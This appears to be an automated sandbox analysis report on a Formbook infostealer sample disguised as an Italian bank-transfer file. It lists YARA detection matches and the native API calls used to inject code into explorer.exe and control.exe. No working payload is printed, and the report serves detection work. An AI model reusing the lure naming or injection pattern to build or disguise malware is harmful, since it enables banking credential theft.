          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/best-cities-by-generation/

          E-Banking Fraud

          Source: Yara match, File source: 6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000008.00000002.3766029603.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.1362056479.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000008.00000002.3765947649.0000000002BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.3766029603.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 00000008.00000002.3766029603.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.3766029603.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1362056479.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 00000000.00000002.1362056479.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1362056479.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.3765947649.0000000002BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 00000008.00000002.3765947649.0000000002BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.3765947649.0000000002BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe PID: 7532, type: MEMORYSTR, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: Process Memory Space: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe PID: 7828, type: MEMORYSTR, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: Process Memory Space: control.exe PID: 7984, type: MEMORYSTR, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: initial sample, Static PE information: Filename: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Code function: 6_2_0041A360 NtCreateFile, 6_2_0041A360
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Code function: 6_2_0041A410 NtReadFile, 6_2_0041A410
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Code function: 6_2_0041A490 NtClose, 6_2_0041A490
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Code function: 6_2_0041A540 NtAllocateVirtualMemory, 6_2_0041A540
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Code function: 6_2_0041A35A NtCreateFile, 6_2_0041A35A
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Code function: 6_2_0041A40A NtReadFile, 6_2_0041A40A
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Code function: 6_2_01102B60 NtClose, LdrInitializeThunk, 6_2_01102B60
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Code function: 6_2_01102BF0 NtAllocateVirtualMemory, LdrInitializeThunk, 6_2_01102BF0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Code function: 6_2_01102AD0 NtReadFile, LdrInitializeThunk, 6_2_01102AD0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Code function: 6_2_01102D10 NtMapViewOfSection, LdrInitializeThunk, 6_2_01102D10
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Code function: 6_2_01102D30 NtUnmapViewOfSection, LdrInitializeThunk, 6_2_01102D30
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Code function: 6_2_01102DD0 NtDelayExecution, LdrInitializeThunk, 6_2_01102DD0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Code function: 6_2_01102DF0 NtQuerySystemInformation, LdrInitializeThunk, 6_2_01102DF0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Code function: 6_2_01102C70 NtFreeVirtualMemory, LdrInitializeThunk, 6_2_01102C70
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Code function: 6_2_01102CA0 NtQueryInformationToken, LdrInitializeThunk, 6_2_01102CA0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Code function: 6_2_01102F30 NtCreateSection, LdrInitializeThunk, 6_2_01102F30
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Code function: 6_2_01102F90 NtProtectVirtualMemory, LdrInitializeThunk, 6_2_01102F90
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Code function: 6_2_01102FB0 NtResumeThread, LdrInitializeThunk, 6_2_01102FB0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Code function: 6_2_01102FE0 NtCreateFile, LdrInitializeThunk, 6_2_01102FE0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Code function: 6_2_01102E80 NtReadVirtualMemory, LdrInitializeThunk, 6_2_01102E80
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Code function: 6_2_01102EA0 NtAdjustPrivilegesToken, LdrInitializeThunk, 6_2_01102EA0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Code function: 6_2_01104340 NtSetContextThread, 6_2_01104340
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Code function: 6_2_01104650 NtSuspendThread, 6_2_01104650
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Code function: 6_2_01102B80 NtQueryInformationFile, 6_2_01102B80
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Code function: 6_2_01102BA0 NtEnumerateValueKey, 6_2_01102BA0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Code function: 6_2_01102BE0 NtQueryValueKey, 6_2_01102BE0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Code function: 6_2_01102AB0 NtWaitForSingleObject, 6_2_01102AB0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Code function: 6_2_01102AF0 NtWriteFile, 6_2_01102AF0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Code function: 6_2_01102D00 NtSetInformationFile, 6_2_01102D00
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Code function: 6_2_01102DB0 NtEnumerateKey, 6_2_01102DB0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Code function: 6_2_01102C00 NtQueryInformationProcess, 6_2_01102C00
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Code function: 6_2_01102C60 NtCreateKey, 6_2_01102C60
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Code function: 6_2_01102CC0 NtQueryVirtualMemory, 6_2_01102CC0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Code function: 6_2_01102CF0 NtOpenProcess, 6_2_01102CF0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Code function: 6_2_01102F60 NtCreateProcessEx, 6_2_01102F60
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Code function: 6_2_01102FA0 NtQuerySection, 6_2_01102FA0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Code function: 6_2_01102E30 NtWriteVirtualMemory, 6_2_01102E30
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Code function: 6_2_01102EE0 NtQueueApcThread, 6_2_01102EE0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Code function: 6_2_01103010 NtOpenDirectoryObject, 6_2_01103010
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Code function: 6_2_01103090 NtSetValueKey, 6_2_01103090
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Code function: 6_2_011035C0 NtCreateMutant, 6_2_011035C0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Code function: 6_2_011039B0 NtGetContextThread, 6_2_011039B0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Code function: 6_2_01103D10 NtOpenProcessToken, 6_2_01103D10
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Code function: 6_2_01103D70 NtOpenThread, 6_2_01103D70
          Source: C:\Windows\explorer.exe, Code function: 7_2_0C611232 NtCreateFile, 7_2_0C611232
          Source: C:\Windows\explorer.exe, Code function: 7_2_0C612E12 NtProtectVirtualMemory, 7_2_0C612E12
          Source: C:\Windows\explorer.exe, Code function: 7_2_0C612E0A NtProtectVirtualMemory, 7_2_0C612E0A
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_047C2C70 NtFreeVirtualMemory, LdrInitializeThunk, 8_2_047C2C70
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_047C2C60 NtCreateKey, LdrInitializeThunk, 8_2_047C2C60
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_047C2CA0 NtQueryInformationToken, LdrInitializeThunk, 8_2_047C2CA0
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_047C2D10 NtMapViewOfSection, LdrInitializeThunk, 8_2_047C2D10
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_047C2DF0 NtQuerySystemInformation, LdrInitializeThunk, 8_2_047C2DF0
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_047C2DD0 NtDelayExecution, LdrInitializeThunk, 8_2_047C2DD0
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_047C2EA0 NtAdjustPrivilegesToken, LdrInitializeThunk, 8_2_047C2EA0
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_047C2F30 NtCreateSection, LdrInitializeThunk, 8_2_047C2F30
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_047C2FE0 NtCreateFile, LdrInitializeThunk, 8_2_047C2FE0
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_047C2AD0 NtReadFile, LdrInitializeThunk, 8_2_047C2AD0
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_047C2B60 NtClose, LdrInitializeThunk, 8_2_047C2B60
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_047C2BF0 NtAllocateVirtualMemory, LdrInitializeThunk, 8_2_047C2BF0
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_047C2BE0 NtQueryValueKey, LdrInitializeThunk, 8_2_047C2BE0
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_047C35C0 NtCreateMutant, LdrInitializeThunk, 8_2_047C35C0
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_047C4650 NtSuspendThread, 8_2_047C4650
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_047C4340 NtSetContextThread, 8_2_047C4340
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_047C2C00 NtQueryInformationProcess, 8_2_047C2C00
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_047C2CF0 NtOpenProcess, 8_2_047C2CF0
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_047C2CC0 NtQueryVirtualMemory, 8_2_047C2CC0
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_047C2D30 NtUnmapViewOfSection, 8_2_047C2D30
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_047C2D00 NtSetInformationFile, 8_2_047C2D00
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_047C2DB0 NtEnumerateKey, 8_2_047C2DB0
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_047C2E30 NtWriteVirtualMemory, 8_2_047C2E30
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_047C2EE0 NtQueueApcThread, 8_2_047C2EE0
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_047C2E80 NtReadVirtualMemory, 8_2_047C2E80
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_047C2F60 NtCreateProcessEx, 8_2_047C2F60
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_047C2FB0 NtResumeThread, 8_2_047C2FB0
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_047C2FA0 NtQuerySection, 8_2_047C2FA0
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_047C2F90 NtProtectVirtualMemory, 8_2_047C2F90
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_047C2AF0 NtWriteFile, 8_2_047C2AF0
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_047C2AB0 NtWaitForSingleObject, 8_2_047C2AB0
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_047C2BA0 NtEnumerateValueKey, 8_2_047C2BA0
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_047C2B80 NtQueryInformationFile, 8_2_047C2B80
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_047C3010 NtOpenDirectoryObject, 8_2_047C3010
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_047C3090 NtSetValueKey, 8_2_047C3090
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_047C3D70 NtOpenThread, 8_2_047C3D70
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_047C3D10 NtOpenProcessToken, 8_2_047C3D10
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_047C39B0 NtGetContextThread, 8_2_047C39B0
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_0254A360 NtCreateFile, 8_2_0254A360
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_0254A410 NtReadFile, 8_2_0254A410
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_0254A490 NtClose, 8_2_0254A490
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_0254A540 NtAllocateVirtualMemory, 8_2_0254A540
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_0254A35A NtCreateFile, 8_2_0254A35A
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_0254A40A NtReadFile, 8_2_0254A40A
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_0453A036 NtQueryInformationProcess, NtSuspendThread, NtSetContextThread, RtlQueueApcWow64Thread, NtResumeThread, 8_2_0453A036
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_04539BAF NtCreateSection, NtMapViewOfSection, NtMapViewOfSection, NtUnmapViewOfSection, NtClose, 8_2_04539BAF
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_0453A042 NtQueryInformationProcess, 8_2_0453A042
          Source: C:\Windows\SysWOW64\control.exe, Code function: 8_2_04539BB2 NtCreateSection, NtMapViewOfSection, NtMapViewOfSection, 8_2_04539BB2
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011620006_2_01162000
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0118A3526_2_0118A352
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010DE3F06_2_010DE3F0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011903E66_2_011903E6
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011702746_2_01170274
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011502C06_2_011502C0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D05356_2_010D0535
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011905916_2_01190591
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011824466_2_01182446
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0117E4F66_2_0117E4F6
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010F47506_2_010F4750
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D07706_2_010D0770
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CC7C06_2_010CC7C0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010EC6E06_2_010EC6E0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010E69626_2_010E6962
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D29A06_2_010D29A0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0119A9A66_2_0119A9A6
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D28406_2_010D2840
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010DA8406_2_010DA840
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010B68B86_2_010B68B8
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010FE8F06_2_010FE8F0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0118AB406_2_0118AB40
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01186BD76_2_01186BD7
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CEA806_2_010CEA80
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010DAD006_2_010DAD00
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010E8DBF6_2_010E8DBF
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CADE06_2_010CADE0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D0C006_2_010D0C00
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01170CB56_2_01170CB5
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C0CF26_2_010C0CF2
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01112F286_2_01112F28
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010F0F306_2_010F0F30
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01144F406_2_01144F40
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0114EFA06_2_0114EFA0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C2FC86_2_010C2FC8
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010DCFE06_2_010DCFE0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0118EE266_2_0118EE26
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D0E596_2_010D0E59
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0118CE936_2_0118CE93
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010E2E906_2_010E2E90
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0118EEDB6_2_0118EEDB
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0119B16B6_2_0119B16B
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010BF1726_2_010BF172
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0110516C6_2_0110516C
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010DB1B06_2_010DB1B0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D70C06_2_010D70C0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0117F0CC6_2_0117F0CC
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011870E96_2_011870E9
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0118F0E06_2_0118F0E0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0118132D6_2_0118132D
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010BD34C6_2_010BD34C
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0111739A6_2_0111739A
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D52A06_2_010D52A0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010EB2C06_2_010EB2C0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011712ED6_2_011712ED
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011875716_2_01187571
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0116D5B06_2_0116D5B0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0118F43F6_2_0118F43F
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C14606_2_010C1460
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0118F7B06_2_0118F7B0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011816CC6_2_011816CC
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011659106_2_01165910
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D99506_2_010D9950
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010EB9506_2_010EB950
